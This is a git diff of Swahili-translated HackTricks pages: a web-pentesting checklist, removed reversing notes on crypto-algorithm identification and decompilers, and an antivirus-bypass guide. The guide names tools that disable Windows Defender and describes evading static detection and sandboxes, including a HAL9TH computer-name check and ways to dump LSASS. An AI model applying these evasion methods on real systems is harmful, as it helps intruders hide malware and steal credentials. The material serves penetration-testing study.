- [ ] [**Cache Poisoning/Cache Deception**](../cache-deception.md)
- [ ] [**HTTP Request Smuggling**](../http-request-smuggling/index.html)
- [ ] [**H2C Smuggling**](../h2c-smuggling.md)
- [ ] [**Server Side Inclusion/Edge Side Inclusion**](../server-side-inclusion-edge-side-inclusion-injection.md)
- [ ] [**Uncovering Cloudflare**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)
- [ ] [**XSLT Server Side Injection**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
- [ ] [**Proxy / WAF Protections Bypass**](../proxy-waf-protections-bypass.md)
## **User input**
> [!TIP]
> Maombi mengi ya mtandao yatakubali **watumiaji kuingiza data ambayo itashughulikiwa baadaye.**\
> Kulingana na muundo wa data ambayo seva inatarajia, udhaifu fulani unaweza kutumika au kutoweza kutumika.
### **Reflected Values**
Ikiwa data iliyowekwa inaweza kwa namna fulani kuakisiwa katika jibu, ukurasa unaweza kuwa na udhaifu wa masuala kadhaa.
- [ ] [**Client Side Template Injection**](../client-side-template-injection-csti.md)
- [ ] [**Command Injection**](../command-injection.md)
- [ ] [**CRLF**](../crlf-0d-0a.md)
- [ ] [**Dangling Markup**](../dangling-markup-html-scriptless-injection/index.html)
- [ ] [**File Inclusion/Path Traversal**](../file-inclusion/index.html)
- [ ] [**Open Redirect**](../open-redirect.md)
- [ ] [**Prototype Pollution to XSS**](../deserialization/nodejs-proto-prototype-pollution/index.html#client-side-prototype-pollution-to-xss)
- [ ] [**Server Side Inclusion/Edge Side Inclusion**](../server-side-inclusion-edge-side-inclusion-injection.md)
- [ ] [**Server Side Request Forgery**](../ssrf-server-side-request-forgery/index.html)
- [ ] [**Server Side Template Injection**](../ssti-server-side-template-injection/index.html)
- [ ] [**Reverse Tab Nabbing**](../reverse-tab-nabbing.md)
- [ ] [**XSLT Server Side Injection**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
- [ ] [**XSS**](../xss-cross-site-scripting/index.html)
- [ ] [**XSSI**](../xssi-cross-site-script-inclusion.md)
- [ ] [**XS-Search**](../xs-search.md)
Baadhi ya udhaifu uliotajwa unahitaji hali maalum, wengine wanahitaji tu maudhui kuakisiwa. Unaweza kupata polygloths kadhaa za kuvutia ili kujaribu haraka udhaifu katika:
{{#ref}}
../pocs-and-polygloths-cheatsheet/
{{#endref}}
### **Search functionalities**
Ikiwa kazi hiyo inaweza kutumika kutafuta aina fulani ya data ndani ya backend, huenda unaweza (kutumika vibaya) kuitumia kutafuta data isiyo na mpangilio.
- [ ] [**File Inclusion/Path Traversal**](../file-inclusion/index.html)
- [ ] [**NoSQL Injection**](../nosql-injection.md)
- [ ] [**LDAP Injection**](../ldap-injection.md)
- [ ] [**ReDoS**](../regular-expression-denial-of-service-redos.md)
- [ ] [**SQL Injection**](../sql-injection/index.html)
- [ ] [**XPATH Injection**](../xpath-injection.md)
### **Forms, WebSockets and PostMsgs**
Wakati websocket inachapisha ujumbe au fomu inayo ruhusu watumiaji kufanya vitendo, udhaifu unaweza kutokea.
- [ ] [**Cross Site Request Forgery**](../csrf-cross-site-request-forgery.md)
- [ ] [**Cross-site WebSocket hijacking (CSWSH)**](../websocket-attacks.md)
- [ ] [**PostMessage Vulnerabilities**](../postmessage-vulnerabilities/index.html)
### **HTTP Headers**
Kulingana na vichwa vya HTTP vilivyotolewa na seva ya wavuti, udhaifu fulani unaweza kuwepo.
- [ ] [**Clickjacking**](../clickjacking.md)
- [ ] [**Content Security Policy bypass**](../content-security-policy-csp-bypass/index.html)
- [ ] [**Cookies Hacking**](../hacking-with-cookies/index.html)
- [ ] [**CORS - Misconfigurations & Bypass**](../cors-bypass.md)
### **Bypasses**
Kuna kazi kadhaa maalum ambapo njia mbadala zinaweza kuwa na manufaa kuzishinda
- [ ] [**2FA/OTP Bypass**](../2fa-bypass.md)
- [ ] [**Bypass Payment Process**](../bypass-payment-process.md)
- [ ] [**Captcha Bypass**](../captcha-bypass.md)
- [ ] [**Login Bypass**](../login-bypass/index.html)
- [ ] [**Race Condition**](../race-condition.md)
- [ ] [**Rate Limit Bypass**](../rate-limit-bypass.md)
- [ ] [**Reset Forgotten Password Bypass**](../reset-password.md)
- [ ] [**Registration Vulnerabilities**](../registration-vulnerabilities.md)
### **Structured objects / Specific functionalities**
Baadhi ya kazi zitahitaji **data kuwa na muundo maalum sana** (kama vile kitu kilichosawazishwa au XML). Kwa hivyo, ni rahisi kubaini ikiwa programu inaweza kuwa na udhaifu kwani inahitaji kushughulikia aina hiyo ya data.\
Baadhi ya **kazi maalum** pia zinaweza kuwa na udhaifu ikiwa **muundo maalum wa ingizo unatumika** (kama vile Email Header Injections).
- [ ] [**Deserialization**](../deserialization/index.html)
- [ ] [**Email Header Injection**](../email-injections.md)
- [ ] [**JWT Vulnerabilities**](../hacking-jwt-json-web-tokens.md)
- [ ] [**XML External Entity**](../xxe-xee-xml-external-entity.md)
### Files
Kazi zinazoruhusu kupakia faili zinaweza kuwa na udhaifu wa masuala kadhaa.\
Kazi zinazozalisha faili ikiwa ni pamoja na ingizo la mtumiaji zinaweza kutekeleza msimbo usiotarajiwa.\
Watumiaji wanaofungua faili zilizopakiwa na watumiaji au zilizozalishwa kiotomatiki ikiwa ni pamoja na ingizo la mtumiaji wanaweza kuathirika.
- [ ] [**File Upload**](../file-upload/index.html)
- [ ] [**Formula Injection**](../formula-csv-doc-latex-ghostscript-injection.md)
- [ ] [**PDF Injection**](../xss-cross-site-scripting/pdf-injection.md)
- [ ] [**Server Side XSS**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
### **External Identity Management**
- [ ] [**OAUTH to Account takeover**](../oauth-to-account-takeover.md)
- [ ] [**SAML Attacks**](../saml-attacks/index.html)
### **Other Helpful Vulnerabilities**
Udhaifu huu unaweza kusaidia kutekeleza udhaifu mwingine.
- [ ] [**Domain/Subdomain takeover**](../domain-subdomain-takeover.md)
- [ ] [**IDOR**](../idor.md)
- [ ] [**Parameter Pollution**](../parameter-pollution.md)
- [ ] [**Unicode Normalization vulnerability**](../unicode-injection/index.html)
{{#include ../../banners/hacktricks-training.md}}

183
src/reversing/cryptographic-algorithms/README.md
View File

@ -1,183 +0,0 @@
# Cryptographic/Compression Algorithms
{{#include ../../banners/hacktricks-training.md}}
## Identifying Algorithms
Ikiwa unamaliza katika msimbo **ukitumia shift rights and lefts, xors na shughuli kadhaa za hesabu** kuna uwezekano mkubwa kwamba ni utekelezaji wa **algorithms ya cryptographic**. Hapa kuna njia kadhaa za **kutambua algorithm inayotumika bila kuhitaji kurudi nyuma kila hatua**.
### API functions
**CryptDeriveKey**
Ikiwa kazi hii inatumika, unaweza kupata ni **algorithm gani inayotumika** ukichunguza thamani ya parameter ya pili:
![](<../../images/image (375) (1) (1) (1) (1).png>)
Angalia hapa jedwali la algorithms zinazowezekana na thamani zao zilizotolewa: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
**RtlCompressBuffer/RtlDecompressBuffer**
Inabana na kufungua buffer fulani ya data.
**CryptAcquireContext**
Kutoka [the docs](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptacquirecontexta): Kazi ya **CryptAcquireContext** inatumika kupata mkono wa chombo maalum cha funguo ndani ya mtoa huduma maalum wa cryptographic (CSP). **Huu mkono uliorejeshwa unatumika katika wito wa kazi za CryptoAPI** zinazotumia CSP iliyochaguliwa.
**CryptCreateHash**
Inaanzisha hashing ya mtiririko wa data. Ikiwa kazi hii inatumika, unaweza kupata ni **algorithm gani inayotumika** ukichunguza thamani ya parameter ya pili:
![](<../../images/image (376).png>)
\
Angalia hapa jedwali la algorithms zinazowezekana na thamani zao zilizotolewa: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
### Code constants
Wakati mwingine ni rahisi sana kutambua algorithm kutokana na ukweli kwamba inahitaji kutumia thamani maalum na ya kipekee.
![](<../../images/image (370).png>)
Ikiwa unatafuta constant ya kwanza kwenye Google hii ndiyo unapata:
![](<../../images/image (371).png>)
Hivyo, unaweza kudhani kwamba kazi iliyotolewa ni **sha256 calculator.**\
Unaweza kutafuta yoyote ya constants nyingine na utapata (labda) matokeo sawa.
### data info
Ikiwa msimbo huna constant yoyote muhimu inaweza kuwa **inapakia habari kutoka sehemu ya .data**.\
Unaweza kufikia data hiyo, **kundi la dword ya kwanza** na kutafuta hiyo kwenye google kama tulivyofanya katika sehemu iliyopita:
![](<../../images/image (372).png>)
Katika kesi hii, ikiwa utaangalia **0xA56363C6** unaweza kupata kwamba inahusiana na **meza za algorithm ya AES**.
## RC4 **(Symmetric Crypt)**
### Characteristics
Imepangwa kwa sehemu 3 kuu:
- **Initialization stage/**: Inaunda **meza ya thamani kutoka 0x00 hadi 0xFF** (256bytes kwa jumla, 0x100). Meza hii kwa kawaida inaitwa **Substitution Box** (au SBox).
- **Scrambling stage**: Itafanya **mzunguko kupitia meza** iliyoundwa hapo awali (mzunguko wa 0x100 iterations, tena) ikibadilisha kila thamani kwa **bytes za nadharia**. Ili kuunda hizi bytes za nadharia, funguo ya RC4 **inatumika**. Funguo za RC4 zinaweza kuwa **kati ya 1 na 256 bytes kwa urefu**, hata hivyo kawaida inapendekezwa iwe juu ya 5 bytes. Kwa kawaida, funguo za RC4 ni 16 bytes kwa urefu.
- **XOR stage**: Hatimaye, maandiko ya wazi au cyphertext **yanapigwa XOR na thamani zilizoundwa hapo awali**. Kazi ya kuandika na kufungua ni sawa. Kwa hili, **mzunguko kupitia bytes 256 zilizoundwa** utafanywa mara nyingi kadri inavyohitajika. Hii kwa kawaida inatambuliwa katika msimbo uliotolewa na **%256 (mod 256)**.
> [!TIP]
> **Ili kutambua RC4 katika msimbo wa disassembly/decompiled unaweza kuangalia kwa mizunguko 2 ya ukubwa 0x100 (kwa kutumia funguo) na kisha XOR ya data ya ingizo na thamani 256 zilizoundwa hapo awali katika mizunguko 2 labda kwa kutumia %256 (mod 256)**
### **Initialization stage/Substitution Box:** (Kumbuka nambari 256 inayotumika kama hesabu na jinsi 0 inavyoandikwa katika kila mahali pa wahusika 256)
![](<../../images/image (377).png>)
### **Scrambling Stage:**
![](<../../images/image (378).png>)
### **XOR Stage:**
![](<../../images/image (379).png>)
## **AES (Symmetric Crypt)**
### **Characteristics**
- Matumizi ya **substitution boxes na lookup tables**
- Inawezekana **kutofautisha AES kutokana na matumizi ya thamani maalum za lookup table** (constants). _Kumbuka kwamba **constant** inaweza **kuhifadhiwa** katika binary **au kuundwa** _**dynamically**._
- Funguo ya **kuandika** lazima iwe **inaweza kugawanywa** kwa **16** (kawaida 32B) na kawaida **IV** ya 16B inatumika.
### SBox constants
![](<../../images/image (380).png>)
## Serpent **(Symmetric Crypt)**
### Characteristics
- Ni nadra kupata malware inayotumia lakini kuna mifano (Ursnif)
- Rahisi kubaini ikiwa algorithm ni Serpent au la kulingana na urefu wake (kazi ndefu sana)
### Identifying
Katika picha ifuatayo angalia jinsi constant **0x9E3779B9** inavyotumika (kumbuka kwamba constant hii pia inatumika na algorithms nyingine za crypto kama **TEA** -Tiny Encryption Algorithm).\
Pia angalia **ukubwa wa mzunguko** (**132**) na **idadi ya shughuli za XOR** katika **maelekezo ya disassembly** na katika **mfano wa msimbo**:
![](<../../images/image (381).png>)
Kama ilivyotajwa hapo awali, msimbo huu unaweza kuonyeshwa ndani ya decompiler yoyote kama **kazi ndefu sana** kwani **hakuna kuruka** ndani yake. Msimbo uliotolewa unaweza kuonekana kama ifuatavyo:
![](<../../images/image (382).png>)
Hivyo, inawezekana kutambua algorithm hii ukichunguza **nambari ya uchawi** na **XORs za awali**, kuona **kazi ndefu sana** na **kulinganisha** baadhi ya **maelekezo** ya kazi ndefu **na utekelezaji** (kama shift left kwa 7 na rotate left kwa 22).
## RSA **(Asymmetric Crypt)**
### Characteristics
- Ngumu zaidi kuliko algorithms za symmetric
- Hakuna constants! (utekelezaji wa kawaida ni mgumu kubaini)
- KANAL (mchambuzi wa crypto) inashindwa kuonyesha vidokezo juu ya RSA na inategemea constants.
### Identifying by comparisons
![](<../../images/image (383).png>)
- Katika mstari wa 11 (kushoto) kuna `+7) >> 3` ambayo ni sawa na katika mstari wa 35 (kulia): `+7) / 8`
- Mstari wa 12 (kushoto) unakagua ikiwa `modulus_len < 0x040` na katika mstari wa 36 (kulia) unakagua ikiwa `inputLen+11 > modulusLen`
## MD5 & SHA (hash)
### Characteristics
- Kazi 3: Init, Update, Final
- Kazi za kuanzisha zinazofanana
### Identify
**Init**
Unaweza kutambua zote mbili ukichunguza constants. Kumbuka kwamba sha_init ina constant 1 ambayo MD5 haina:
![](<../../images/image (385).png>)
**MD5 Transform**
Kumbuka matumizi ya constants zaidi
![](<../../images/image (253) (1) (1) (1).png>)
## CRC (hash)
- Ndogo na yenye ufanisi kwani kazi yake ni kupata mabadiliko yasiyokusudiwa katika data
- Inatumia lookup tables (hivyo unaweza kutambua constants)
### Identify
Angalia **constants za lookup table**:
![](<../../images/image (387).png>)
Algorithm ya hash ya CRC inaonekana kama:
![](<../../images/image (386).png>)
## APLib (Compression)
### Characteristics
- Hakuna constants zinazotambulika
- Unaweza kujaribu kuandika algorithm hiyo katika python na kutafuta mambo yanayofanana mtandaoni
### Identify
Grafu ni kubwa sana:
![](<../../images/image (207) (2) (1).png>)
Angalia **kulinganisha 3 kutambua**:
![](<../../images/image (384).png>)
{{#include ../../banners/hacktricks-training.md}}

114
src/reversing/reversing-tools/README.md
View File

@ -1,114 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
# Mwongozo wa Decompilation ya Wasm na Uundaji wa Wat
Katika ulimwengu wa **WebAssembly**, zana za **decompiling** na **compiling** ni muhimu kwa waendelezaji. Mwongo huu unawasilisha baadhi ya rasilimali za mtandaoni na programu za kushughulikia **Wasm (WebAssembly binary)** na **Wat (WebAssembly text)**.
## Zana za Mtandaoni
- Ili **decompile** Wasm hadi Wat, zana inayopatikana kwenye [Wabt's wasm2wat demo](https://webassembly.github.io/wabt/demo/wasm2wat/index.html) inasaidia.
- Kwa **compiling** Wat kurudi kwa Wasm, [Wabt's wat2wasm demo](https://webassembly.github.io/wabt/demo/wat2wasm/) inatumika.
- Chaguo kingine cha decompilation kinaweza kupatikana kwenye [web-wasmdec](https://wwwg.github.io/web-wasmdec/).
## Suluhisho za Programu
- Kwa suluhisho thabiti zaidi, [JEB by PNF Software](https://www.pnfsoftware.com/jeb/demo) inatoa vipengele vingi.
- Mradi wa chanzo wazi [wasmdec](https://github.com/wwwg/wasmdec) pia unapatikana kwa kazi za decompilation.
# Rasilimali za Decompilation ya .Net
Decompiling assemblies za .Net inaweza kufanywa kwa zana kama:
- [ILSpy](https://github.com/icsharpcode/ILSpy), ambayo pia inatoa [plugin kwa Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode), ikiruhusu matumizi ya cross-platform.
- Kwa kazi zinazohusisha **decompilation**, **modification**, na **recompilation**, [dnSpy](https://github.com/0xd4d/dnSpy/releases) inapendekezwa sana. **Kulia-bofya** njia na kuchagua **Modify Method** inaruhusu mabadiliko ya msimbo.
- [JetBrains' dotPeek](https://www.jetbrains.com/es-es/decompiler/) ni chaguo jingine kwa decompiling assemblies za .Net.
## Kuimarisha Debugging na Logging na DNSpy
### Logging ya DNSpy
Ili kuandika taarifa kwenye faili kwa kutumia DNSpy, jumuisha kipande hiki cha msimbo wa .Net:
%%%cpp
using System.IO;
path = "C:\\inetpub\\temp\\MyTest2.txt";
File.AppendAllText(path, "Password: " + password + "\n");
%%%
### Debugging ya DNSpy
Kwa debugging bora na DNSpy, mfululizo wa hatua unashauriwa kubadilisha **Assembly attributes** kwa ajili ya debugging, kuhakikisha kuwa optimizations ambazo zinaweza kuzuia debugging zimezimwa. Mchakato huu unajumuisha kubadilisha mipangilio ya `DebuggableAttribute`, recompiling assembly, na kuokoa mabadiliko.
Zaidi ya hayo, ili debug programu ya .Net inayotumiwa na **IIS**, kutekeleza `iisreset /noforce` kunaanzisha upya IIS. Ili kuunganisha DNSpy kwenye mchakato wa IIS kwa ajili ya debugging, mwongo huu unashauri kuchagua mchakato wa **w3wp.exe** ndani ya DNSpy na kuanza kikao cha debugging.
Kwa mtazamo wa kina wa moduli zilizoloadiwa wakati wa debugging, kufikia dirisha la **Modules** ndani ya DNSpy kunashauriwa, kisha kufungua moduli zote na kupanga assemblies kwa urahisi wa urambazaji na debugging.
Mwongo huu unajumuisha kiini cha WebAssembly na decompilation ya .Net, ukitoa njia kwa waendelezaji kuhamasika katika kazi hizi kwa urahisi.
## **Java Decompiler**
Ili decompile bytecode ya Java, zana hizi zinaweza kuwa na msaada mkubwa:
- [jadx](https://github.com/skylot/jadx)
- [JD-GUI](https://github.com/java-decompiler/jd-gui/releases)
## **Debugging DLLs**
### Kutumia IDA
- **Rundll32** inaloadiwa kutoka njia maalum za toleo la 64-bit na 32-bit.
- **Windbg** inachaguliwa kama debugger na chaguo la kusimamisha wakati wa kupakia/kutoa maktaba limewezeshwa.
- Mipangilio ya utekelezaji inajumuisha njia ya DLL na jina la kazi. Mpangilio huu unasimamisha utekelezaji wakati wa kupakia kila DLL.
### Kutumia x64dbg/x32dbg
- Kama IDA, **rundll32** inaloadiwa na marekebisho ya mistari ya amri ili kubainisha DLL na kazi.
- Mipangilio inarekebishwa ili kuvunja kwenye kuingia kwa DLL, ikiruhusu kuweka breakpoint kwenye kiingilio kinachotakiwa cha DLL.
### Picha
- Mahali pa kusimamisha utekelezaji na mipangilio yanaonyeshwa kupitia picha za skrini.
## **ARM & MIPS**
- Kwa emulation, [arm_now](https://github.com/nongiach/arm_now) ni rasilimali muhimu.
## **Shellcodes**
### Mbinu za Debugging
- **Blobrunner** na **jmp2it** ni zana za kugawa shellcodes katika kumbukumbu na kuzi-debug na Ida au x64dbg.
- Blobrunner [releases](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5)
- jmp2it [compiled version](https://github.com/adamkramer/jmp2it/releases/)
- **Cutter** inatoa emulation na ukaguzi wa shellcode kwa kutumia GUI, ikionyesha tofauti katika kushughulikia shellcode kama faili dhidi ya shellcode ya moja kwa moja.
### Deobfuscation na Uchambuzi
- **scdbg** inatoa maarifa kuhusu kazi za shellcode na uwezo wa deobfuscation.
%%%bash
scdbg.exe -f shellcode # Taarifa za msingi
scdbg.exe -f shellcode -r # Ripoti ya uchambuzi
scdbg.exe -f shellcode -i -r # Hooks za mwingiliano
scdbg.exe -f shellcode -d # Dump shellcode iliyotafsiriwa
scdbg.exe -f shellcode /findsc # Pata ofset ya kuanzia
scdbg.exe -f shellcode /foff 0x0000004D # Tekeleza kutoka ofset
%%%
- **CyberChef** kwa ajili ya kuondoa shellcode: [CyberChef recipe](https://gchq.github.io/CyberChef/#recipe=To_Hex%28'Space',0%29Disassemble_x86%28'32','Full%20x86%20architecture',16,0,true,true%29)
## **Movfuscator**
- Obfuscator inayobadilisha maagizo yote kuwa `mov`.
- Rasilimali muhimu ni pamoja na [YouTube explanation](https://www.youtube.com/watch?v=2VF_wPkiBJY) na [PDF slides](https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas_2015_the_movfuscator.pdf).
- **demovfuscator** inaweza kubadilisha obfuscation ya movfuscator, ikihitaji utegemezi kama `libcapstone-dev` na `libz3-dev`, na kufunga [keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md).
## **Delphi**
- Kwa binaries za Delphi, [IDR](https://github.com/crypto2011/IDR) inapendekezwa.
# Kozi
- [https://github.com/0xZ0F/Z0FCourse_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse_ReverseEngineering)
- [https://github.com/malrev/ABD](https://github.com/malrev/ABD) \(Binary deobfuscation\)
{{#include ../../banners/hacktricks-training.md}}

460
src/windows-hardening/av-bypass.md
View File

@ -1,104 +1,104 @@
# Antivirus (AV) Bypass
# Kuikwepa Antivirus (AV)
{{#include ../banners/hacktricks-training.md}}
**Ukurasa huu uliandikwa na** [**@m2rc_p**](https://twitter.com/m2rc_p)**!**
## Kusimamisha Defender
## Zima Defender
- [defendnot](https://github.com/es3n1n/defendnot): Chombo cha kusimamisha Windows Defender kufanya kazi.
- [no-defender](https://github.com/es3n1n/no-defender): Chombo cha kusimamisha Windows Defender kwa kuiga AV nyingine.
- [defendnot](https://github.com/es3n1n/defendnot): Chombo cha kuzima Windows Defender ili isifanye kazi.
- [no-defender](https://github.com/es3n1n/no-defender): Chombo cha kuzima Windows Defender kwa kuigiza AV nyingine.
- [Disable Defender if you are admin](basic-powershell-for-pentesters/README.md)
## **AV Evasion Methodology**
Kwa sasa, AVs hutumia mbinu mbalimbali za kuangalia kama faili ni mbaya au la: static detection, dynamic analysis, na kwa EDRs zilizo juu zaidi, behavioural analysis.
Kwa sasa, AVs zinatumia njia tofauti za kukagua kama faili ni hatari au la: static detection, dynamic analysis, na kwa EDRs zilizo za juu zaidi, behavioural analysis.
### **Static detection**
Static detection inafikiwa kwa kuangazia known malicious strings au arrays za bytes ndani ya binary au script, na pia kwa kutoa taarifa kutoka kwa faili yenyewe (mfano file description, company name, digital signatures, icon, checksum, n.k.). Hii inamaanisha kwamba kutumia public tools zinazojulikana kunaweza kukufanya ugunduliwe kwa urahisi, kwa sababu huenda tayari zimechunguzwa na kuorodheshwa kama zenye hatari. Kuna njia kadhaa za kuzunguka aina hii ya utambuzi:
Static detection inafanyika kwa kupigia alama nyuzi au safu za bytes zinazojulikana kama hatari ndani ya binary au script, na pia kwa kutoa taarifa kutoka kwa faili yenyewe (mf. file description, company name, digital signatures, icon, checksum, n.k.). Hii inamaanisha kwamba kutumia zana za umma zilizo maarufu kunaweza kukufanya ugundulike kwa urahisi zaidi, kwa kuwa huenda zimetumikiwa na kuchambuliwa na kupigiwa alama kama hatari. Kuna njia kadhaa za kuepuka aina hii ya utambuzi:
- **Encryption**
Ikiwa utaencrypt binary, hakutakuwa na njia kwa AV kugundua program yako, lakini utahitaji aina fulani ya loader ili decrypt na kuendesha program hiyo kwenye memory.
Ikiwa utaficha (encrypt) binary, haitakuwa na njia AV za kugundua programu yako, lakini utahitaji aina fulani ya loader ili kuifungua (decrypt) na kuendesha programu ndani ya memory.
- **Obfuscation**
Wakati mwingine unachotakiwa kufanya ni kubadilisha baadhi ya strings katika binary au script yako ili ipite mbele ya AV, lakini hili linaweza kuwa kazi inayochukua muda kulingana na unachojaribu obfuscate.
Mara nyingine yote unayohitaji ni kubadilisha baadhi ya strings ndani ya binary au script yako ili kuepuka AV, lakini hii inaweza kuwa kazi inayochukua muda kulingana na unachojaribu kuficha.
- **Custom tooling**
Ikiwa utatengeneza tools zako mwenyewe, haitakuwa na known bad signatures, lakini hii inachukua muda mwingi na juhudi.
Ikiwa utatengeneza zana zako mwenyewe, haitakuwa na signatures mbaya zinazojulikana, lakini hii inachukua muda na juhudi nyingi.
> [!TIP]
> Njia nzuri ya kuangalia dhidi ya Windows Defender static detection ni [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck). Kwa msingi split faili kwenye segments nyingi kisha kuagiza Defender iscan kila segment moja moja, kwa njia hii inaweza kukuambia kwa usahihi ni strings au bytes zipi zilizopigwa flag katika binary yako.
> Njia nzuri ya kukagua kuhusiana na Windows Defender static detection ni [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck). Kwa kawaida inagawanya faili kuwa sehemu nyingi kisha inaagiza Defender iskanie kila sehemu kando-kando; kwa njia hii inaweza kukuambia hasa ni strings au bytes gani zilizo pangiliwa kama hatari kwenye binary yako.
Ninapendekeza uangalie hii [YouTube playlist](https://www.youtube.com/playlist?list=PLj05gPj8rk_pkb12mDe4PgYZ5qPxhGKGf) kuhusu AV Evasion ya vitendo.
Ninapendekeza sana uangalie [YouTube playlist](https://www.youtube.com/playlist?list=PLj05gPj8rk_pkb12mDe4PgYZ5qPxhGKGf) kuhusu AV Evasion ya vitendo.
### **Dynamic analysis**
Dynamic analysis ni pale AV inapoweka binary yako ndani ya sandbox na kuangalia shughuli za uharibifu (mfano kujaribu decrypt na kusoma passwords za browser, kufanya minidump kwenye LSASS, n.k.). Sehemu hii inaweza kuwa ngumu zaidi kushughulikia, lakini hapa kuna mambo unaweza kufanya ili kuepuka sandboxes.
Dynamic analysis ni pale ambapo AV inaendesha binary yako ndani ya sandbox na inatazama shughuli hatarishi (mf. kujaribu kufungua (decrypt) na kusoma nywila za browser yako, kufanya minidump kwenye LSASS, n.k.). Sehemu hii inaweza kuwa ngumu zaidi kufanya kazi nayo, lakini hizi ni baadhi ya mambo unaweza kufanya ili kuepuka sandboxes.
- **Sleep before execution** Kulingana na jinsi imeimplementiwa, inaweza kuwa njia nzuri ya kupita dynamic analysis ya AV. AVs zina muda mfupi sana wa kuscan faili ili zisitokee kuingilia mtiririko wa kazi wa mtumiaji, hivyo kutumia long sleeps kunaweza kuingilia uchunguzi wa binaries. Tatizo ni kwamba sandboxes za AV nyingi zinaweza kupita sleep tu kulingana na jinsi imekaziwa.
- **Checking machine's resources** Kwa kawaida Sandboxes zina resources chache (mfano < 2GB RAM), vinginevyo zingedharauzesha machine ya mtumiaji. Unaweza kuwa mbunifu hapa, kwa mfano ukakagua joto la CPU au hata fan speeds, sio kila kitu kitatekelezwa kwenye sandbox.
- **Machine-specific checks** Ikiwa unataka kulenga mtumiaji ambaye workstation yake imejiunga na domain ya "contoso.local", unaweza kufanya check kwenye domain ya kompyuta kuona kama inalingana na ile uliyotaja; kama haitalingani, unaweza kufanya program yako exit.
- **Sleep before execution** Kulingana na jinsi ilivyotekelezwa, inaweza kuwa njia nzuri ya kuepuka dynamic analysis ya AV. AV zina muda mfupi sana wa kuskania faili ili zisilete usumbufu kwa mtumiaji, hivyo kutumia sleeps ndefu kunaweza kuharibu uchambuzi wa binaries. Tatizo ni kwamba sandboxes za AV nyingi zinaweza kupita juu ya sleep kulingana na jinsi zilivyotekelezwa.
- **Checking machine's resources** Kawaida Sandboxes zina rasilimali chache sana za kutumia (mf. < 2GB RAM), vinginevyo zingesababisha kuzipunguza mashine za watumiaji. Unaweza pia kuwa mkali katika ubunifu hapa, kwa mfano kwa kuchunguza joto la CPU au hata kasi za fan; sio kila kitu kitatekelezwa ndani ya sandbox.
- **Machine-specific checks** Ikiwa unataka kulenga mtumiaji ambaye workstation yake imejiunga na domain ya "contoso.local", unaweza kufanya ukaguzi wa domain ya kompyuta kuona kama inalingana na ile uliyoainisha; ikiwa haifai, unaweza kufanya programu yako itoke.
Inabainika kuwa computername ya Microsoft Defender's Sandbox ni HAL9TH, kwa hivyo, unaweza kukagua computer name katika malware yako kabla ya detonation; ikiwa name inalingana na HAL9TH, inamaanisha uko ndani ya defender's sandbox, hivyo unaweza kufanya program yako exit.
Imebainika kuwa computername ya Microsoft Defender's Sandbox ni HAL9TH, hivyo unaweza kuangalia jina la kompyuta kwenye malware yako kabla ya detonation; ikiwa jina linafanana na HAL9TH, inamaanisha uko ndani ya defender's sandbox, hivyo unaweza kufanya programu yako itoke.
<figure><img src="../images/image (209).png" alt=""><figcaption><p>source: <a href="https://youtu.be/StSLxFbVz0M?t=1439">https://youtu.be/StSLxFbVz0M?t=1439</a></p></figcaption></figure>
<figure><img src="../images/image (209).png" alt=""><figcaption><p>chanzo: <a href="https://youtu.be/StSLxFbVz0M?t=1439">https://youtu.be/StSLxFbVz0M?t=1439</a></p></figcaption></figure>
Baadhi ya vidokezo vingine nzuri kutoka kwa [@mgeeky](https://twitter.com/mariuszbit) kuhusu jinsi ya kukabiliana na Sandboxes
Mikono mingine ya ushauri mzuri kutoka kwa [@mgeeky](https://twitter.com/mariuszbit) kuhusu kukabiliana na Sandboxes
<figure><img src="../images/image (248).png" alt=""><figcaption><p><a href="https://discord.com/servers/red-team-vx-community-1012733841229746240">Red Team VX Discord</a> #malware-dev channel</p></figcaption></figure>
Kama tulivyosema hapo awali, public tools hatimaye zitagunduliwa, kwa hivyo, jiulize jambo hili:
Kama tulivyosema hapo awali kwenye chapisho hili, **public tools** hatimaye zitakuwa **detected**, kwa hivyo, unapaswa kuuliza swali:
Kwa mfano, kama unataka dump LSASS, je, kweli unahitaji kutumia mimikatz? Au unaweza kutumia project nyingine ambayo hairuhusiwi sana na pia inadump LSASS?
Kwa mfano, ikiwa unataka dump LSASS, **je, lazima utumie mimikatz**? Au unaweza kutumia mradi mwingine usiojulikana sana ambao pia huunda dump ya LSASS.
Jibu sahihi labda ni hili la pili. Kuchukua mimikatz kama mfano, huenda ikawa moja ya, kama sio ile iliyopigwa flag zaidi, kipande cha malware na AVs na EDRs; ingawa project yenyewe ni nzuri sana, pia ni nightmare kuifanya iwe kazi ili kuzunguka AVs, kwa hivyo tafuta mbadala kwa kile unachojaribu kufanikisha.
Jibu sahihi labda ni la pili. Kuchukua mimikatz kama mfano, huenda ni mojawapo ya, kama siyo ile iliyopigwa alama zaidi na AVs na EDRs; mradi wenyewe ni mzuri sana, lakini pia ni taabu kuufanya ufanye kazi ili kuzunguka AVs, hivyo tafuta mbadala kwa kile unachojaribu kufanikisha.
> [!TIP]
> Unapobadilisha payloads zako kwa ajili ya evasion, hakikisha kuzima automatic sample submission katika defender, na tafadhali, kwa uzito, **USIPANUELEZE VIRUSTOTAL** ikiwa lengo lako ni kufanikiwa evasion kwa muda mrefu. Ikiwa unataka kuangalia kama payload yako inagunduliwa na AV fulani, install kwenye VM, jaribu kuzima automatic sample submission, na ifanyie majaribio huko hadi utakapofurahi na matokeo.
